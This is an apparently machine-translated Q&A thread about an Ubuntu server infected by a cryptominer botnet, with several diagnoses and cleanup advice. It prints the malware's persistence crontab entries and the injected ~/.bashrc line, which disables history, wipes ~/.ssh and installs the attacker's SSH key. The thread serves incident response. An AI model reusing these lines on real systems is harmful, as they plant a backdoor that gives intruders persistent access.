奇怪的Cron Job占用了100%的CPU Ubuntu 18 LTS服务器

21

我一直在出现堰工的工作,我不知道他们做什么。我通常会发出kill -9来阻止它们。它们占用了我100%的CPU,并且可以运行数天,直到我检查为止。有人知道这意味着什么吗?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

截至昨天7/24/2019,我正在完全运行Ubuntu 18 LTS服务器

更新

我感谢所有反馈。我已断开所有数据和应用程序驱动器的连接,因为唯一受影响的是操作系统驱动器,至少我做了正确的事情。我要进行一次全面的重建,以提供更多的安全性和更安全的方法。

server  cron  rsync 
MCP_infiltrator
source
8
.firefoxcatche可能与Firefox没有任何关系-这可能只是比特币矿工吗?尝试将可执行文件上传到virustotal。
汤姆威格斯
1
通过运行crontab文件是/root/.firefoxcatche/a/upd/root/.firefoxcatche/b/sync
托姆威格斯
2
“我找不到crontab对其进行哈希处理”是什么意思?为什么sudo crontab -e编辑不起作用?但是,如果这是您未安装的加密货币矿工,则将其重新添加。首先查看“ /root/.firefoxcatche/a/upd”的功能。
Rinzwind
2
“我必须以root用户身份登录才能到达那里吗?”我不希望从管理员那里看到这个问题。您确实需要知道从现在开始的工作。尽快更改管理员密码。检查cron中列出的文件。消灭他们。
Rinzwind
1
就是这么简单;-)我维护10多个Google Cloud实例。有了我可以想象出的任何问题的应急计划,错了。如果会发生类似的情况,我将销毁根实例,创建一个新实例,针对克隆扫描数据磁盘,扫描差异,然后将其附加到实例。并实施一些诱捕该人的措施,以防止其再次发生。就我而言,我的薪水取决于此;-)
Rinzwind

Answers:

40

您的机器很可能感染了加密矿工。在带有Security Center的Azure中对虚拟机进行实时检测时,您可以看到其他人报告了类似的文件名和行为。另请参阅我的Ubuntu Server感染了病毒...在Reddit上找到了它,但无法摆脱它

您不能再信任该计算机,而应该重新安装它。还原备份时要小心。

汤姆·威格斯
source
8
我同意。root密码已被盗用,因此请重新安装并非常小心备份;它也可以在那里。
Rinzwind
9

您的计算机已感染了加密矿工攻击。过去,我也面临过类似的勒索软件攻击,而且我的数据库也受到了威胁。我对该计算机进行了SQL转储,然后重新配置了该计算机(因为我的计算机是AWS EC2上托管的VM)。我还修改了计算机的安全组以锁定SSH访问并修改了密码。我还启用了日志记录功能来记录查询并将其每晚导出到S3。

beadityak
source
4

我也发生了同样的事情,昨天我注意到了。我检查了文件/var/log/syslog,该IP(185.234.218.40)似乎正在自动执行cronjobs。

我在http://whatismyipaddress.comhttps://whatismyipaddress.com/ip/185.234.218.40)上进行了检查,并且有一些报告。这些文件由木马编辑:

  • .bashrc
  • .ssh / authorized_keys

我在.bashrc(每次打开bash都会执行)的末尾找到它:

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

它正在删除您的authorized_keys文件,该文件是允许无需密码即可连接的SSH密钥的列表。然后,添加攻击者的SSH密钥:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

此外,我找到了以下文件夹:/tmp/.X13-unix/.rsync,所有恶意软件都在其中。我什至发现一个文件,/tmp/.X13-unix/.rsync/c/ip该文件包含70000个IP地址,很可能是其他受害者或节点服务器。

有两种解决方案:答:

  • 添加防火墙以阻止除端口22和您认为必要的其他端口之外的所有传出连接,并启用fail2ban(该程序会在X次尝试输入密码失败后禁止IP地址)

  • 杀死所有cron作业: ps aux | grep cron,然后杀死显示的PID

  • 将您的密码更改为安全的密码

B:

  • 备份您需要或想要的任何文件或文件夹

  • 重置服务器并重新安装Ubuntu,或直接创建新的Droplet

    就像Thom Wiggers所说的那样,您当然是比特币挖矿僵尸网络的一部分,并且您的服务器带有后门。后门使用perl漏洞,该文件位于此处:/tmp/.X13-unix/.rsync/b/run,包含此文件(https://pastebin.com/ceP2jsUy

我发现的最可疑的文件夹是:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (已编辑)

  • ~/.firefoxcatche

最后,这里有一篇与Perl后门有关的文章:https : //blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

希望这个对你有帮助。

奥克哈克斯
source
我擦除了os驱动器,然后重新安装,Ubuntu创建了一个很长的新密码和新的ssh密钥
MCP_infiltrator
是的,这是一个很好的解决方案:)
Oqhax
这是一个非常有用的答案-感谢您了解~/.bashrc已编辑的事实。我发现要杀死rsync我必须发出的假象kill -9 <pid>
Benny Hill
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.